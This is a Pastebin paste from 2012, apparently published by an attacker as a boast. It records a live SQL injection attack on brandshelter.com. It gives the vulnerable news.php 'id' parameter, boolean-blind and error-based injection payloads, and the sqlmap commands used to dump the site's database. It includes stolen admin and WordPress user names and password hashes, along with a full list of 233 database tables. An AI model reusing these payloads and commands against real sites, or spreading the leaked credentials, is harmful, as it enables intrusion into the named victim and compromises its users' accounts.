API tools faq
paste
Advertisement
Islam-Hacker

Greeting to Saudi Team-5) 7-9-2012 brandshelter.com

Islam-Hacker
Sep 7th, 2012
343
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.57 KB | None | 0 0
raw download clone embed print report
  1. Greeting to saudi team ;)
  2. Published by JM511 ;0
  3. Twitter.com/JM511
  4. bbm;21EB3DBB
  5. =============
  6.  
  7. http://www.brandshelter.com/en/
  8. Database: db_wy2c75fus9
  9. Table: users
  10. [1 entry]
  11. +--------+-------------------+---------+----------+------------------------------------------+-----+--------+----------+
  12. | active | email | groupID | name | password | url | userID | username |
  13. +--------+-------------------+---------+----------+------------------------------------------+-----+--------+----------+
  14. | y | [email protected] | 1 | New User | d7cf95a11a90b97a121335fda1964e61787010d1 | NULL | 1 | admin |
  15. +--------+-------------------+---------+----------+------------------------------------------+-----+--------+----------+
  16.  
  17. [23:37:35] [INFO] Table 'db_wy2c75fus9.users' dumped to CSV file '/home/jm511/.sqlmap/output/brandshelter.com/dump/db_wy2c75fus9/users.csv'
  18. [23:37:35] [INFO] Fetched data logged to text files under '/home/jm511/.sqlmap/output/brandshelter.com'
  19.  
  20. [*] shutting down at: 23:37:35
  21.  
  22. jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://brandshelter.com/en/news/news.php?id=181 -D db_wy2c75fus9 -T wp-users --dump
  23.  
  24. sqlmap/0.9 - automatic SQL injection and database takeover tool
  25. http://sqlmap.sourceforge.net
  26.  
  27. [*] starting at: 01:06:20
  28.  
  29. [01:06:20] [INFO] using '/home/jm511/.sqlmap/output/brandshelter.com/session' as session file
  30. [01:06:20] [INFO] resuming injection data from session file
  31. [01:06:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
  32. [01:06:20] [INFO] testing connection to the target url
  33. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  34. ---
  35. Place: GET
  36. Parameter: id
  37. Type: boolean-based blind
  38. Title: AND boolean-based blind - WHERE or HAVING clause
  39. Payload: id=181 AND 7622=7622
  40.  
  41. Type: error-based
  42. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  43. Payload: id=181 AND (SELECT 7817 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,122,119,58),(SELECT (CASE WHEN (7817=7817) THEN 1 ELSE 0 END)),CHAR(58,99,112,110,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  44. ---
  45.  
  46. [01:06:21] [INFO] the back-end DBMS is MySQL
  47.  
  48. web application technology: Apache
  49. back-end DBMS: MySQL 5.0
  50. [01:06:21] [INFO] fetching columns for table '`wp-users`' on database 'db_wy2c75fus9'
  51. [01:06:21] [WARNING] it was not possible to count the number of entries for the used SQL query. sqlmap will assume that it returns only one entry
  52. [01:06:22] [WARNING] unable to retrieve column names
  53. [01:06:22] [INFO] Fetched data logged to text files under '/home/jm511/.sqlmap/output/brandshelter.com'
  54.  
  55. [*] shutting down at: 01:06:22
  56.  
  57. jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://brandshelter.com/en/news/news.php?id=181 -D db_wy2c75fus9 -T wp_users --dump
  58.  
  59. sqlmap/0.9 - automatic SQL injection and database takeover tool
  60. http://sqlmap.sourceforge.net
  61.  
  62. [*] starting at: 01:06:30
  63.  
  64. [01:06:30] [INFO] using '/home/jm511/.sqlmap/output/brandshelter.com/session' as session file
  65. [01:06:30] [INFO] resuming injection data from session file
  66. [01:06:30] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
  67. [01:06:30] [INFO] testing connection to the target url
  68. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  69. ---
  70. Place: GET
  71. Parameter: id
  72. Type: boolean-based blind
  73. Title: AND boolean-based blind - WHERE or HAVING clause
  74. Payload: id=181 AND 7622=7622
  75.  
  76. Type: error-based
  77. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  78. Payload: id=181 AND (SELECT 7817 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,122,119,58),(SELECT (CASE WHEN (7817=7817) THEN 1 ELSE 0 END)),CHAR(58,99,112,110,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  79. ---
  80.  
  81. [01:06:30] [INFO] the back-end DBMS is MySQL
  82.  
  83. web application technology: Apache
  84. back-end DBMS: MySQL 5.0
  85. [01:06:30] [INFO] fetching columns for table 'wp_users' on database 'db_wy2c75fus9'
  86. [01:06:31] [INFO] the SQL query used returns 10 entries
  87. [01:06:31] [INFO] retrieved: ID
  88. [01:06:32] [INFO] retrieved: bigint(20) unsigned
  89. [01:06:32] [INFO] retrieved: user_login
  90. [01:06:33] [INFO] retrieved: varchar(60)
  91. [01:06:33] [INFO] retrieved: user_pass
  92. [01:06:33] [INFO] retrieved: varchar(64)
  93. [01:06:34] [INFO] retrieved: user_nicename
  94. [01:06:34] [INFO] retrieved: varchar(50)
  95. [01:06:35] [INFO] retrieved: user_email
  96. [01:06:35] [INFO] retrieved: varchar(100)
  97. [01:06:35] [INFO] retrieved: user_url
  98. [01:06:36] [INFO] retrieved: varchar(100)
  99. [01:06:38] [INFO] retrieved: user_registered
  100. [01:06:38] [INFO] retrieved: datetime
  101. [01:06:38] [INFO] retrieved: user_activation_key
  102. [01:06:39] [INFO] retrieved: varchar(60)
  103. [01:06:39] [INFO] retrieved: user_status
  104. [01:06:40] [INFO] retrieved: int(11)
  105. [01:06:41] [INFO] retrieved: display_name
  106. [01:06:42] [INFO] retrieved: varchar(250)
  107. [01:06:42] [INFO] fetching entries for table 'wp_users' on database 'db_wy2c75fus9'
  108. [01:06:42] [INFO] the SQL query used returns 1 entries
  109. [01:06:43] [INFO] retrieved: 0
  110. [01:06:43] [INFO] retrieved: Jensemann
  111. [01:06:44] [INFO] retrieved: Jensemann
  112. [01:06:45] [INFO] retrieved: jensemann
  113. [01:06:45] [INFO] retrieved: 2010-08-19 10:07:50
  114. [01:06:46] [INFO] retrieved: $P$BxyBuOTOwvfyfXWkfMF/7mZ1akv3MS1
  115. [01:06:46] [INFO] retrieved: 1
  116. [01:06:46] [INFO] retrieved: [email protected]
  117. Database: db_wy2c75fus9
  118. Table: wp_users
  119. [1 entry]
  120. +--------------+----+---------------------+-------------------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+
  121. | display_name | ID | user_activation_key | user_email | user_login | user_nicename | user_pass | user_registered | user_status | user_url |
  122. +--------------+----+---------------------+-------------------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+
  123. | Jensemann | 1 | None | [email protected] | Jensemann | jensemann | $P$BxyBuOTOwvfyfXWkfMF/7mZ1akv3MS1 | 2010-08-19 10:07:50 | 0 | None |
  124. +--------------+----+---------------------+-------------------------------------+------------+---------------+------------------------------------+---------------------+-------------+----------+
  125. Database: db_wy2c75fus9
  126. [233 tables]
  127. +------------------------------------+
  128. | EB3categories |
  129. | EB3comments |
  130. | EB3menu_links |
  131. | EB3options |
  132. | EB3posts |
  133. | EB3users |
  134. | EB3users_groups |
  135. | EB3users_groups2permissions |
  136. | EB3users_permissions |
  137. | articles |
  138. | articles_en |
  139. | be_groups |
  140. | be_sessions |
  141. | be_users |
  142. | brand_comments |
  143. | brand_icl_content_status |
  144. | brand_icl_core_status |
  145. | brand_icl_flags |
  146. | brand_icl_languages |
  147. | brand_icl_languages_translations |
  148. | brand_icl_locale_map |
  149. | brand_icl_node |
  150. | brand_icl_plugins_texts |
  151. | brand_icl_string_status |
  152. | brand_icl_string_translations |
  153. | brand_icl_strings |
  154. | brand_icl_translations |
  155. | brand_links |
  156. | brand_options |
  157. | brand_postmeta |
  158. | brand_posts |
  159. | brand_term_relationships |
  160. | brand_term_taxonomy |
  161. | brand_terms |
  162. | brand_usermeta |
  163. | brand_users |
  164. | brandshelter_authors |
  165. | brandshelter_news_de |
  166. | brandshelter_news_en |
  167. | brandshelter_news_status |
  168. | cache_extensions |
  169. | cache_hash |
  170. | cache_imagesizes |
  171. | cache_md5params |
  172. | cache_pages |
  173. | cache_pagesection |
  174. | cache_typo3temp_log |
  175. | calendar_event |
  176. | calendar_users |
  177. | categories |
  178. | comments |
  179. | dotsaar_ak_popularity |
  180. | dotsaar_ak_popularity_options |
  181. | dotsaar_cat_visibility |
  182. | dotsaar_comments |
  183. | dotsaar_icl_content_status |
  184. | dotsaar_icl_core_status |
  185. | dotsaar_icl_flags |
  186. | dotsaar_icl_languages |
  187. | dotsaar_icl_languages_translations |
  188. | dotsaar_icl_locale_map |
  189. | dotsaar_icl_node |
  190. | dotsaar_icl_plugins_texts |
  191. | dotsaar_icl_string_status |
  192. | dotsaar_icl_string_translations |
  193. | dotsaar_icl_strings |
  194. | dotsaar_icl_translations |
  195. | dotsaar_leaguemanager_leagues |
  196. | dotsaar_leaguemanager_matches |
  197. | dotsaar_leaguemanager_stats |
  198. | dotsaar_leaguemanager_teams |
  199. | dotsaar_links |
  200. | dotsaar_ngg_album |
  201. | dotsaar_ngg_gallery |
  202. | dotsaar_ngg_pictures |
  203. | dotsaar_options |
  204. | dotsaar_postmeta |
  205. | dotsaar_posts |
  206. | dotsaar_term_relationships |
  207. | dotsaar_term_taxonomy |
  208. | dotsaar_terms |
  209. | dotsaar_usermeta |
  210. | dotsaar_users |
  211. | dotsaar_wp125_ads |
  212. | ebl_categories |
  213. | ebl_comments |
  214. | ebl_menu_links |
  215. | ebl_posts |
  216. | ebl_users |
  217. | ebl_users_ip |
  218. | fe_groups |
  219. | fe_session_data |
  220. | fe_sessions |
  221. | fe_users |
  222. | index_config |
  223. | index_debug |
  224. | index_fulltext |
  225. | index_grlist |
  226. | index_phash |
  227. | index_rel |
  228. | index_section |
  229. | index_stat_search |
  230. | index_stat_word |
  231. | index_words |
  232. | ks_nav_home |
  233. | menu_links |
  234. | options |
  235. | optionscategories |
  236. | optionscomments |
  237. | optionsmenu_links |
  238. | optionsoptions |
  239. | optionsposts |
  240. | optionsusers |
  241. | optionsusers_groups |
  242. | optionsusers_groups2permissions |
  243. | optionsusers_permissions |
  244. | pages |
  245. | pages_language_overlay |
  246. | phpbb_acl_groups |
  247. | phpbb_acl_options |
  248. | phpbb_acl_roles |
  249. | phpbb_acl_roles_data |
  250. | phpbb_acl_users |
  251. | phpbb_attachments |
  252. | phpbb_banlist |
  253. | phpbb_bbcodes |
  254. | phpbb_bookmarks |
  255. | phpbb_bots |
  256. | phpbb_config |
  257. | phpbb_confirm |
  258. | phpbb_disallow |
  259. | phpbb_drafts |
  260. | phpbb_extension_groups |
  261. | phpbb_extensions |
  262. | phpbb_forums |
  263. | phpbb_forums_access |
  264. | phpbb_forums_track |
  265. | phpbb_forums_watch |
  266. | phpbb_groups |
  267. | phpbb_icons |
  268. | phpbb_lang |
  269. | phpbb_log |
  270. | phpbb_moderator_cache |
  271. | phpbb_modules |
  272. | phpbb_poll_options |
  273. | phpbb_poll_votes |
  274. | phpbb_posts |
  275. | phpbb_privmsgs |
  276. | phpbb_privmsgs_folder |
  277. | phpbb_privmsgs_rules |
  278. | phpbb_privmsgs_to |
  279. | phpbb_profile_fields |
  280. | phpbb_profile_fields_data |
  281. | phpbb_profile_fields_lang |
  282. | phpbb_profile_lang |
  283. | phpbb_ranks |
  284. | phpbb_reports |
  285. | phpbb_reports_reasons |
  286. | phpbb_search_results |
  287. | phpbb_search_wordlist |
  288. | phpbb_search_wordmatch |
  289. | phpbb_sessions |
  290. | phpbb_sessions_keys |
  291. | phpbb_sitelist |
  292. | phpbb_smilies |
  293. | phpbb_styles |
  294. | phpbb_styles_imageset |
  295. | phpbb_styles_imageset_data |
  296. | phpbb_styles_template |
  297. | phpbb_styles_template_data |
  298. | phpbb_styles_theme |
  299. | phpbb_topics |
  300. | phpbb_topics_posted |
  301. | phpbb_topics_track |
  302. | phpbb_topics_watch |
  303. | phpbb_user_group |
  304. | phpbb_users |
  305. | phpbb_warnings |
  306. | phpbb_words |
  307. | phpbb_zebra |
  308. | posts |
  309. | static_countries |
  310. | static_country_zones |
  311. | static_currencies |
  312. | static_languages |
  313. | static_markets |
  314. | static_template |
  315. | static_territories |
  316. | static_tsconfig_help |
  317. | sys_action |
  318. | sys_action_asgr_mm |
  319. | sys_be_shortcuts |
  320. | sys_domain |
  321. | sys_filemounts |
  322. | sys_history |
  323. | sys_language |
  324. | sys_lockedrecords |
  325. | sys_log |
  326. | sys_note |
  327. | sys_preview |
  328. | sys_refindex |
  329. | sys_refindex_rel |
  330. | sys_refindex_res |
  331. | sys_refindex_words |
  332. | sys_template |
  333. | sys_workspace |
  334. | tt_content |
  335. | tt_news |
  336. | tt_news_cat |
  337. | tt_news_cat_mm |
  338. | tt_news_related_mm |
  339. | tx_impexp_presets |
  340. | tx_rtehtmlarea_acronym |
  341. | tx_staticinfotables_hotlist |
  342. | tx_templavoila_datastructure |
  343. | tx_templavoila_tmplobj |
  344. | users |
  345. | users_groups |
  346. | users_groups2permissions |
  347. | users_permissions |
  348. | vote2 |
  349. | voted2 |
  350. | wp_commentmeta |
  351. | wp_comments |
  352. | wp_links |
  353. | wp_options |
  354. | wp_postmeta |
  355. | wp_posts |
  356. | wp_term_relationships |
  357. | wp_term_taxonomy |
  358. | wp_terms |
  359. | wp_usermeta |
  360. | wp_users |
  361. +------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!